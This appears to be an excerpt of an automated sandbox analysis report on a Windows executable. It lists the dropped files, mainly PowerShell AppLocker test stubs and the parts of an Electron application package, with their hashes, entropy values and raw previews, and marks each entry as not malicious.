                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v3f2l4rp.mf2.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vff55k5r.f3n.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wh2ofd4d.lgr.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whdcb2yr.ukc.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmbkxf2k.fps.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtsiowsw.bvl.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybvnqnrp.hkt.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykbd1z0s.tez.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5xzgije.tmu.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\IoNixNginx.exe

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):160084992
                                                                                                                                                                      Entropy (8bit):6.744040501876811
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1572864:/LBZB52nvuZ7wVuMbgR7Sp6kYdEctmhoLsPagBsgkx52HYhwj+vfIBUdoJnP9Dj0:/ypCmJctBjj2+Jv
                                                                                                                                                                      MD5:4DE03596272B7D7B70FF34893D072F21
                                                                                                                                                                      SHA1:BC07189E5B35BC6AE9319E07ED107EDCA583231E
                                                                                                                                                                      SHA-256:1D8AB53874B2EDFB058DD64DA8A61D92C8A8E302CC737155E0D718DBE169BA36
                                                                                                                                                                      SHA-512:9C63702A0F07E2104C161036CE269CF7C4516DFC97C1D9DF979FE42757D6020CACDC2186AF8BDA9E6EAAB7D010D882372F52553CB5EBC7F890A84137D1654A40
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........."......0...T.......F.........@..........................................`...........................................+.. ..0"..h............Pt.._@..........P.......!.......................!.(... Q..@...........@8......`.*......................text...:/.......0.................. ..`.rdata..h.n..@....n..4..............@..@.data....TB...1.......1.............@....pdata..._@..Pt..`@...9.............@..@.00cfg..0.............z.............@..@.gxfg...pA.......B....z.............@..@.retplne.............Dz..................rodata...... .......Fz............. ..`.tls.........@.......Xz.............@...CPADinfo8....P.......\z.............@...LZMADEC......`.......^z............. ..`_RDATA..\............pz.............@..@malloc_h+............rz............. ..`.rsrc................xz.............@..@.reloc......P........|.............@..B................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\LICENSE.electron.txt

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1096
                                                                                                                                                                      Entropy (8bit):5.13006727705212
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                                                                                                      MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                                                                                                      SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                                                                                                                      SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                                                                                                                      SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\LICENSES.chromium.html

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8312662
                                                                                                                                                                      Entropy (8bit):4.705814170451806
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:dbTy6TU675kfWScRQfJw91SmfJB6i6e6R626X8HHdE/pG6:tygpj
                                                                                                                                                                      MD5:312446EDF757F7E92AAD311F625CEF2A
                                                                                                                                                                      SHA1:91102D30D5ABCFA7B6EC732E3682FB9C77279BA3
                                                                                                                                                                      SHA-256:C2656201AC86438D062673771E33E44D6D5E97670C3160E0DE1CB0BD5FBBAE9B
                                                                                                                                                                      SHA-512:DCE01F2448A49A0E6F08BBDE6570F76A87DCC81179BB51D5E2642AD033EE81AE3996800363826A65485AB79085572BBACE51409AE7102ED1A12DF65018676333
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title" style="float:left;">Credits</span>.<a id="print-link" href="#" style="float:right;" hidden>Print</a>.<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<input type="checkbox" hidden id="0">.<label class="show" for="0" tabindex="0"></label>.<div class="licence">.<pre>Copyright(C) 1997,2001 Takuya OOURA (email: ooura@kurims.kyoto-u.ac.jp)..You may us

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\chrome_100_percent.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):127125
                                                                                                                                                                      Entropy (8bit):7.915612661029362
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:vlKzwqCT4wDNzIwL2o418Gb0+VRLf0ld0GY3cQ39Vm2I:vlKzwt4uEgK18Gb0OV8ld0GecQ3f2
                                                                                                                                                                      MD5:ACD0FA0A90B43CD1C87A55A991B4FAC3
                                                                                                                                                                      SHA1:17B84E8D24DA12501105B87452F86BFA5F9B1B3C
                                                                                                                                                                      SHA-256:CCBCA246B9A93FA8D4F01A01345E7537511C590E4A8EFD5777B1596D10923B4B
                                                                                                                                                                      SHA-512:3E4C4F31C6C7950D5B886F6A8768077331A8F880D70B905CF7F35F74BE204C63200FF4A88FA236ABCCC72EC0FC102C14F50DD277A30F814F35ADFE5A7AE3B774
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..............t...#.....:.I...J~p...K~6...L~....M~#...N~....O~`...P~m...Q~....R~....S~I...T~....U~'"..V~.,..^~.7.._~;9..b~v:..c~(<..j~.<..k~.B..l~fH..m~.J..n~.K..o~.L.....M.....N....aP....IS....BV....uY.....]....Pa.....d....h....i...hk....l....m...An....n.....................................K.....x...........4.....m.....D.............................1........................'.....*.....4.....>.....C.....D....hM.....U.....V....>X.....Z....E].....]....a...%c....d....f....h....i....k....l....o...wq....t...7v....y....}....~...m................................3.................g.....6............................k.....-...........3.....9......................H.......................Y.................{.....s....M..............F...................&....y..............\....p....Z.........Z.........g...........................T..................6...............M.................r...........1.................X.................u.......

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\chrome_200_percent.pak

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):177406
                                                                                                                                                                      Entropy (8bit):7.939611912805236
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:4DQYaEQN6AJPKNzIwafR54x5GMR+F44ffbdZnYw9p4AbIVGYoDd+HxNK/rIM0:4DQYaNN68QEVgx5GMRejnbdZnVE6YopY
                                                                                                                                                                      MD5:4610337E3332B7E65B73A6EA738B47DF
                                                                                                                                                                      SHA1:8D824C9CF0A84AB902E8069A4DE9BF6C1A9AAF3B
                                                                                                                                                                      SHA-256:C91ABF556E55C29D1EA9F560BB17CC3489CB67A5D0C7A22B58485F5F2FBCF25C
                                                                                                                                                                      SHA-512:039B50284D28DCD447E0A486A099FA99914D29B543093CCCDA77BBEFDD61F7B7F05BB84B2708AE128C5F2D0C0AB19046D08796D1B5A1CFF395A0689AB25CCB51
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..............t...#.....:.t...J~....K~....L~....M~....N~....O~....P~.%..Q~.*..R~.-..S~c5..T~.9..U~.A..V~.V..^~Ck.._~.m..b~)o..c~yr..j~#s..k~.}..l~....m~...n~...o~......................................K.....!..................Q..............*........................a.......................,%....H0.....2....E:....(A.....F.....L.....R.....T....QY....:].....f.....i....br....Sv..........C...........).................].....}................................................................................................. ....!....%.....*.....,..........O/...../....y1.....2....l4.....6.....7....A:.....?.....C.....K.....S.....Y....._.....e....Ok.....l.....m.....n.....o.....q.....r.....s.....u....:w..............P............................%.............7................,........G........u.............B........S.........a....%........;.....................l...........T..........R...........6..........).............

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\d3dcompiler_47.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4916712
                                                                                                                                                                      Entropy (8bit):6.398049523846958
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:KCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvhiD0N+YEzI4og/RfzHLeHTRhFRNc:xG2QCwmHPnog/pzHAo/A6l
                                                                                                                                                                      MD5:2191E768CC2E19009DAD20DC999135A3
                                                                                                                                                                      SHA1:F49A46BA0E954E657AAED1C9019A53D194272B6A
                                                                                                                                                                      SHA-256:7353F25DC5CF84D09894E3E0461CEF0E56799ADBC617FCE37620CA67240B547D
                                                                                                                                                                      SHA-512:5ADCB00162F284C16EC78016D301FC11559DD0A781FFBEFF822DB22EFBED168B11D7E5586EA82388E9503B0C7D3740CF2A08E243877F5319202491C8A641C970
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d...^.}`.........." ......8..........<).......................................K.....:FK...`A........................................`%G.x....(G.P.....J.@.....H.......J..%....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\ffmpeg.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2883072
                                                                                                                                                                      Entropy (8bit):6.697367886822868
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:YGJO72cNsdMZWfAn1fdmZMOqcQrGhjUHgNxGUwSCmmfYDJGz5SN3lzl3hSKqH:Jj8n1QqGCmmfIUz59t
                                                                                                                                                                      MD5:E096C168B79A56DED0DF1AA142D9F1DA
                                                                                                                                                                      SHA1:318F20DAB294A315BD935160E9417FB5B28300F5
                                                                                                                                                                      SHA-256:65CC75329D17EC264E7A2DB571EA55F918394241445EA64569A56C75D0CFDC60
                                                                                                                                                                      SHA-512:3DCCF6CE85EF7E75690A5851642F10BB5E6E1572E91E933BACB7FCBFE405B0412B94BA0E160C3BA8D68D2B9AFC1DA268F61C83DCCD6453D8C9470931EE900BFD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." .....$#..................................................@B...........`A..........................................*.......*.(.............@...............B..3....).......................).(....R#.@............"*.P............................text....##......$#................. ..`.rdata..l....@#......(#.............@..@.data...x.....*.."....*.............@....pdata........@.......*.............@..@.00cfg..8.....A.......+.............@..@.gxfg....,....A.......+.............@..@.retplne......A.......+..................tls..........A.......+.............@..._RDATA..\.....A.......+.............@..@.reloc...3....B..4....+.............@..B........................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\icudtl.dat

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):10542048
                                                                                                                                                                      Entropy (8bit):6.277141340322909
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:98304:OKPBQYOo+ddlymOk25flQCUliXUxiG9Ha93Whla6ZGdnp/8k:OKPBhORjOhCliXUxiG9Ha93Whla6ZGrn
                                                                                                                                                                      MD5:D89CE8C00659D8E5D408C696EE087CE3
                                                                                                                                                                      SHA1:49FC8109960BE3BB32C06C3D1256CB66DDED19A8
                                                                                                                                                                      SHA-256:9DFBE0DAD5C7021CFE8DF7F52458C422CBC5BE9E16FF33EC90665BB1E3F182DE
                                                                                                                                                                      SHA-512:DB097CE3EB9E132D0444DF79B167A7DCB2DF31EFFBBD3DF72DA3D24AE2230CC5213C6DF5E575985A9918FBD0A6576E335B6EBC12B6258BC93FA205399DE64C37
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html .Q....B.......B...#...B.. $...B..p$...B...$...B...%...B..`P...C...P...C...Q..(C......<C.....OC......bC..@...uC.......C..P....C.......C.......C..p....C.. ....C.......C.......D..p... D.....3D..0...FD.....YD.....lD.......D......D..0....D.......D..p....D......D..@....D.......E......E..@...*E.....=E..P...NE......bE.....rE..@....E.......E.......E..P....E.......E......E..@....F.......F.....'F..0...7F..P...JF......aF......qF...G...F.. H...F..`K...F...K...F...L...F...-...F...c...G....'.'G....'.>G..@.'.UG..0.'.oG....'..G...!'..G...!'..G..P&'..G...)'..G..@*'..H..`.(..H...e).7H..0.).VH...)*.xH....*..H....*..H...P+..H...Y+..H...Z+..I...]+. I..`^+.9I.. .+.UI....+.lI....+..I..P.-..I...=...I.......I.......I.. ....J..p....J......-J..p...EJ......ZJ......rJ..`....J..@....J.......J.......J..0....J.......J.......J..0....K..@....K..../.2K...,/.GK..../.\K..

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\libEGL.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):481280
                                                                                                                                                                      Entropy (8bit):6.330677392522242
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:F9L2FFtoVsruIzUEzUST6uHKw+BubaOQ74PlqF8:F9CGafznzUSTRY70I
                                                                                                                                                                      MD5:1EECFB04C4434F5A813C8F0C0C8F2C88
                                                                                                                                                                      SHA1:6DC3CA4B3F72E7FB33BA26FA488DE323EDB59ADD
                                                                                                                                                                      SHA-256:897CEB95FB164640DDD2426673997B5F6FC2619FD916B038B575A70A0682A706
                                                                                                                                                                      SHA-512:D7818A42A76508AC3150AEA8D4E168B2DB36F55F71983A177002086380A82E307624CFE37B01FFC3D7EB407485D182654D0D7C6A0C06CCAAE60666630469C7E0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." .....$................................................................`A........................................00......F>..(.......x.... ...C..............0....(.......................'..(...@A..@...........pA...............................text....".......$.................. ..`.rdata.......@.......(..............@..@.data....L....... ..................@....pdata...C... ...D..................@..@.00cfg..8....p......................@..@.gxfg...`$.......&..................@..@.retplne.............>...................tls....!............@..............@..._RDATA..\............B..............@..@.rsrc...x............D..............@..@.reloc..0............J..............@..B................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\libGLESv2.dll

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7625728
                                                                                                                                                                      Entropy (8bit):6.463180789552528
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:98304:U8qvGdDtslh+LD3ZDWfnSvBSDU5bPm3k89Ld3gsOMt/:JD3ZXJ7bPWLWsD/
                                                                                                                                                                      MD5:CBA2436016F7A2838588A52D5B6F30F1
                                                                                                                                                                      SHA1:81DDF44B3E122DFBEE1A2CD8D4544364F1A621A4
                                                                                                                                                                      SHA-256:BCB3A3D2FCA3C33FA3D1D5DC976AA913CDC8001DF8E64C2CD3D2C545245141BF
                                                                                                                                                                      SHA-512:D92A880B5F83C5AE10AE9A83E38A293BB0E8C7659DD6ECE162FC752D57C9FCDE8036B81B023CD9F0F4F32B95B06FD4C366E20301010354B6CB904398A3149A44
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
